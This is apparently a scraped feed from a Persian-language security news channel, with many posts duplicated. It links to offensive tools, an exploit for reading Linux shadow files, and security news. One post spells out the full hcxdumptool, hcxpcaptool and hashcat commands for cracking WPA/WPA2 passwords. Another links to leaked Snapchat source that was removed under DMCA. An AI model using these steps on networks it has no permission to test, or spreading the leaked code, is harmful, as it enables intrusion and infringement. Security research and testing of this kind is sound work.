این ابزار با استفاده از خروجی nmap سرویسها را بروت فورس میکند و قابلیت شناسایی پورتهای غیراستاندارد را نیز دارد.
https://github.com/x90skysn3k/brutespray
#nmap
#bruteforce
#medusa
@sec_nerd
https://github.com/x90skysn3k/brutespray
#nmap
#bruteforce
#medusa
@sec_nerd
شخصی سورس snapchat را بصورت عمومی منتشر کرد.
طبق درخواست یکی از مسئولان اسنپ، این سورس از گیت هاب حذف شده است.
https://github.com/github/dmca/commit/7f359b0798e924363ac16910514b1f0e5a9d6fa1
سورس اصلی در لینک زیر منتشر شده بود که در حال حاضر پیام کپی رایت گیت هاب در آن قرار داده شده است:
https://github.com/i5xx/Source-SnapChat/
تنها نتیجه جستجوی فایل مربوطه در گوگل به لینک زیر منتهی میشود:
https://uploadfiles.io/e513h
#snapchat
#news
#github
@sec_nerd
طبق درخواست یکی از مسئولان اسنپ، این سورس از گیت هاب حذف شده است.
https://github.com/github/dmca/commit/7f359b0798e924363ac16910514b1f0e5a9d6fa1
سورس اصلی در لینک زیر منتشر شده بود که در حال حاضر پیام کپی رایت گیت هاب در آن قرار داده شده است:
https://github.com/i5xx/Source-SnapChat/
تنها نتیجه جستجوی فایل مربوطه در گوگل به لینک زیر منتهی میشود:
https://uploadfiles.io/e513h
#snapchat
#news
#github
@sec_nerd
GitHub
Process DMCA request · github/dmca@7f359b0
Repository with text of DMCA takedown notices as received. GitHub does not endorse or adopt any assertion contained in the following notices. Users identified in the notices are presumed innocent until proven guilty. Additional information about our DMCA…
افزونه burp برای رمزگشایی ترافیک whatsapp
https://github.com/romanzaikin/BurpExtension-WhatsApp-Decryption-CheckPoint
#burpsuite
#whatsapp
@sec_nerd
https://github.com/romanzaikin/BurpExtension-WhatsApp-Decryption-CheckPoint
#burpsuite
@sec_nerd
هک کردن WPA/WPA2 با استفاده از روش جدید حمله به WiFi
دریافت PMKID از دستگاه هدف با استفاده از ابزار https://github.com/ZerBea/hcxdumptool
$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 –enable_status
تبدیل فایل تولید شده به هش با استفاده از https://github.com/ZerBea/hcxtools
$ ./hcxpcaptool -z test.16800 test.pcapng
کرک کردن هش با استفاده از hashcat
$ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!
این مرحله بستگی به میزان پیچیدگی پسورد دارد
توضیحات بیشتر:
https://securityaffairs.co/wordpress/75170/hacking/hacking-wifi-wpa-wpa2.html
#wifi
#pentest
#network
#wpa2
@sec_nerd
دریافت PMKID از دستگاه هدف با استفاده از ابزار https://github.com/ZerBea/hcxdumptool
$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 –enable_status
تبدیل فایل تولید شده به هش با استفاده از https://github.com/ZerBea/hcxtools
$ ./hcxpcaptool -z test.16800 test.pcapng
کرک کردن هش با استفاده از hashcat
$ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!
این مرحله بستگی به میزان پیچیدگی پسورد دارد
توضیحات بیشتر:
https://securityaffairs.co/wordpress/75170/hacking/hacking-wifi-wpa-wpa2.html
#wifi
#pentest
#network
#wpa2
@sec_nerd
GitHub
GitHub - ZerBea/hcxdumptool: Small tool to capture packets from wlan devices.
Small tool to capture packets from wlan devices. Contribute to ZerBea/hcxdumptool development by creating an account on GitHub.
امنیت اطلاعات
افزونه burp برای رمزگشایی ترافیک whatsapp https://github.com/romanzaikin/BurpExtension-WhatsApp-Decryption-CheckPoint #burpsuite #whatsapp @sec_nerd
در واتس اپ آسیب پذیریهایی کشف شده است که به کاربر اجازه میدهد که هر پیامی را در گفتگوهای خصوصی و عمومی تغییر دهد.
این مشکل به کاربر اجازه میدهد تا اخبار نادرست را در جایی که منبع قابل اعتمادی است منتشر کند.
این کار بوسیله افزونه معرفی شده در پست فوق قابل انجام است و در ویدیوی زیر میتوانید نحوه انجام آن را ببینید.
https://www.youtube.com/watch?v=rtSFaHPA0C4
منبع:
https://research.checkpoint.com/fakesapp-a-vulnerability-in-whatsapp/
#whatsapp
#privacy
#burpsuite
@sec_nerd
این مشکل به کاربر اجازه میدهد تا اخبار نادرست را در جایی که منبع قابل اعتمادی است منتشر کند.
این کار بوسیله افزونه معرفی شده در پست فوق قابل انجام است و در ویدیوی زیر میتوانید نحوه انجام آن را ببینید.
https://www.youtube.com/watch?v=rtSFaHPA0C4
منبع:
https://research.checkpoint.com/fakesapp-a-vulnerability-in-whatsapp/
#privacy
#burpsuite
@sec_nerd
YouTube
FakesApp: A Vulnerability in WhatsApp
Check Point Research shows new vulnerabilities in the popular messaging application that could allow threat actors to intercept and manipulate messages sent in both private and group conversations, giving attackers immense power to create and spread misinformation…
استفاده از فایلهای باینری در ویندوز که کاربردهای دوگانه دارند و بهره گیری از آنها در عملیات Post Exploitation (شاید عبارت پسانفوذ معادل یک کلمه ای خوبی برای این مورد باشه) به همراه فریمورک Koadic برای بالابردن سطح دسترسی در ویندوز و نفوذ به سایر سیستم های موجود در شبکه
https://blog.varonis.com/koadic-lol-malware-meets-python-based-command-and-control-c2-server-part-i/
#windows
#network
#privesc
#pivoting
#koadic
#mshta
#lolbin
@sec_nerd
https://blog.varonis.com/koadic-lol-malware-meets-python-based-command-and-control-c2-server-part-i/
#windows
#network
#privesc
#pivoting
#koadic
#mshta
#lolbin
@sec_nerd
Varonis
Koadic: LoL Malware Meets Python-Based Command and Control (C2) Server, Part I
In my epic series on Windows binaries that have dual uses– talkin’ to you rundll32 and mshta — I showed how hackers can stealthy download and launch remote script-based malware....
امنیت اطلاعات
هک کردن WPA/WPA2 با استفاده از روش جدید حمله به WiFi دریافت PMKID از دستگاه هدف با استفاده از ابزار https://github.com/ZerBea/hcxdumptool $ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 –enable_status تبدیل فایل تولید شده به هش با استفاده از https://g…
رایت آپ کشف باگ در استارباکس
https://0xpatrik.com/subdomain-takeover-starbucks-ii/
#bugbounty
#starbucks
#subdomain
@sec_nerd
https://0xpatrik.com/subdomain-takeover-starbucks-ii/
#bugbounty
#starbucks
#subdomain
@sec_nerd
Patrik Hudak
Subdomain Takeover: Yet another Starbucks case
Recently, I was repeatedly awarded $2,000 bounty for subdomain takeover on Starbucks. In this post, I explain the step-by-step process for the proof-of-concept.
هشدار دولت امریکا در خصوص حملات ادامه دار به زیرساختهای این کشور
بر اساس گزارش دپارتمان امنیت داخلی (معادل وزارت کشور میشه فکر میکنم) گروههای هکری روس به زیرساختهای حیاتی امریکا از جمله زیرساختهای انرژی نفوذ کرده اند و هنوز هم در حال هدف قراردادن این بخش هستند.
این حملات میتوانند پیامدهای ناگواری به همراه داشته باشند، طوری که یک حمله علیه شبکه برق میتواند باعث خاموشی گسترده شود.
بر اساس نظر کارشناسان دولتی، هکرها حتی قادرند به شبکه های ایزوله شده (air gapped) نیز دست یابند.
بر اساس گزارش وال استریت ژورنال،هکرهای روس اذعان کردند که در یک عملیات طولانی مدت موفق به دستیابی به اتاقهای کنترل برق شدند که میتوانستند باعث بوجود آمدن خاموشی شوند.
گروه های هکری روس با استفاده از تکنیک های #spear_phishing اقدام به آلوده کردن تولیدکنندگان تجهیزات میکنند تا اطلاعات بدست آمده را برای نفوذ به زیرساختها مورد استفاده قرار دهند.
هکرها هدفشان از اینکار اکسپلویت کردن دسترسی های سازندگان تجهیزات به قسمتهای تله متری و تعمیر است و آنها را قادر میسازد که حتی بدافزارهای خود را در سیستم های زیرساختی اجرا کنند.
منبع:
https://securityaffairs.co/wordpress/74709/apt/russia-hack-critical-infrastructure-2.html
#usa
#russia
#dhs
#scada
#power_grid
#outage
#news
@sec_nerd
بر اساس گزارش دپارتمان امنیت داخلی (معادل وزارت کشور میشه فکر میکنم) گروههای هکری روس به زیرساختهای حیاتی امریکا از جمله زیرساختهای انرژی نفوذ کرده اند و هنوز هم در حال هدف قراردادن این بخش هستند.
این حملات میتوانند پیامدهای ناگواری به همراه داشته باشند، طوری که یک حمله علیه شبکه برق میتواند باعث خاموشی گسترده شود.
بر اساس نظر کارشناسان دولتی، هکرها حتی قادرند به شبکه های ایزوله شده (air gapped) نیز دست یابند.
بر اساس گزارش وال استریت ژورنال،هکرهای روس اذعان کردند که در یک عملیات طولانی مدت موفق به دستیابی به اتاقهای کنترل برق شدند که میتوانستند باعث بوجود آمدن خاموشی شوند.
گروه های هکری روس با استفاده از تکنیک های #spear_phishing اقدام به آلوده کردن تولیدکنندگان تجهیزات میکنند تا اطلاعات بدست آمده را برای نفوذ به زیرساختها مورد استفاده قرار دهند.
هکرها هدفشان از اینکار اکسپلویت کردن دسترسی های سازندگان تجهیزات به قسمتهای تله متری و تعمیر است و آنها را قادر میسازد که حتی بدافزارهای خود را در سیستم های زیرساختی اجرا کنند.
منبع:
https://securityaffairs.co/wordpress/74709/apt/russia-hack-critical-infrastructure-2.html
#usa
#russia
#dhs
#scada
#power_grid
#outage
#news
@sec_nerd
Security Affairs
DHS - Russian APT groups are inside US critical infrastructure
The US Government is warning of continuous intrusions in National critical infrastructure and it is blaming the Kremlin for the cyber attacks.
انتشار ابزار Ring0 Army Knife که مدتها توسط گروه های هکری مورد استفاده قرار میگرفت.
این ابزار که یک ابزار کامند لاین است به شما اجازه میدهد تا عملیاتهای خواندن، نوشتن و اجرای دستور را در مد کرنل انجام دهید.
در واقع اجرای دستورات در این لایه باعث میشود تا ابزارهای امنیتی مانند آنتی ویروسها (که خود نیز بواسطه برخی درایورها، در لایه کرنل مستقر هستند) نسبت به پروسه فعال حساس نشوند.
این ابزار در ویندوزهای ۸ و بالاتر قابلیت اجرا دارد.
نکته جالب این قضیه اینجاست که بدافزارهای این لایه اجازه نمیدهند تا ماژول کاربر از ترافیک ایجاد شده توسط ماژول کرنل مطلع شود و عملا امکان شناسایی ترافیک نیز وجود نخواهد داشت.
به زودی شرح کاملتری در خصوص این موضوع ارائه خواهیم کرد.
https://github.com/ionescu007/r0ak
#windows
#kernel
#malware
#apt
#ring0
@sec_nerd
این ابزار که یک ابزار کامند لاین است به شما اجازه میدهد تا عملیاتهای خواندن، نوشتن و اجرای دستور را در مد کرنل انجام دهید.
در واقع اجرای دستورات در این لایه باعث میشود تا ابزارهای امنیتی مانند آنتی ویروسها (که خود نیز بواسطه برخی درایورها، در لایه کرنل مستقر هستند) نسبت به پروسه فعال حساس نشوند.
این ابزار در ویندوزهای ۸ و بالاتر قابلیت اجرا دارد.
نکته جالب این قضیه اینجاست که بدافزارهای این لایه اجازه نمیدهند تا ماژول کاربر از ترافیک ایجاد شده توسط ماژول کرنل مطلع شود و عملا امکان شناسایی ترافیک نیز وجود نخواهد داشت.
به زودی شرح کاملتری در خصوص این موضوع ارائه خواهیم کرد.
https://github.com/ionescu007/r0ak
#windows
#kernel
#malware
#apt
#ring0
@sec_nerd
GitHub
GitHub - ionescu007/r0ak
Contribute to ionescu007/r0ak development by creating an account on GitHub.
This media is not supported in your browser
VIEW IN TELEGRAM
فعالسازی God Mode در بکدورهای کشف شده در برخی پردازنده های X86
https://github.com/xoreaxeaxeax/rosenbridge
#cpu
#kernel
#backdoor
@sec_nerd
https://github.com/xoreaxeaxeax/rosenbridge
#cpu
#kernel
#backdoor
@sec_nerd
اکسپلویت خواندن فایلهای دلخواه از جمله فایل Shadow در لینوکسهای کرنل 4.14.7 که اوبونتو 16.04 و CentOS 7 جزو این دسته هستند.
https://www.exploit-db.com/exploits/45175
#linux
#exploit
@sec_nerd
https://www.exploit-db.com/exploits/45175
#linux
#exploit
@sec_nerd
شرکت GoDaddy قربانی بعدی مجرمان سایبری است که اغلب از نقطه ضعف سرورهای ابری آمازون سوء استفاده میکنند.
دیتابیسی که بر روی یک باکت آمازون بصورت محافظت نشده رها شده بود حاوی اطلاعات داخلی بیش از 31 هزار سیستم Godaddy است.
این اطلاعات شامل تخفیف های ارائه شده به کاربران مختلف، فایلهای پیکربندی، مشخصات سیستمها ، مناطق و جزییات دیگر است.
این فایل با نام abbottgodaddy بر روی سرور قرار داشت.
اطلاعات بیشتر:
https://www.hackread.com/sensitive-data-on-godaddy-servers-exposed-online/
#news
#godaddy
#amazon
#s3
@sec_nerd
دیتابیسی که بر روی یک باکت آمازون بصورت محافظت نشده رها شده بود حاوی اطلاعات داخلی بیش از 31 هزار سیستم Godaddy است.
این اطلاعات شامل تخفیف های ارائه شده به کاربران مختلف، فایلهای پیکربندی، مشخصات سیستمها ، مناطق و جزییات دیگر است.
این فایل با نام abbottgodaddy بر روی سرور قرار داشت.
اطلاعات بیشتر:
https://www.hackread.com/sensitive-data-on-godaddy-servers-exposed-online/
#news
#godaddy
#amazon
#s3
@sec_nerd
HackRead
Sensitive data on 31,000 GoDaddy servers exposed online
Unsecure AWS S3 Bucket (Amazon Web Services) Claims Another Victim — This Time it is GoDaddy and 30,000 of its servers.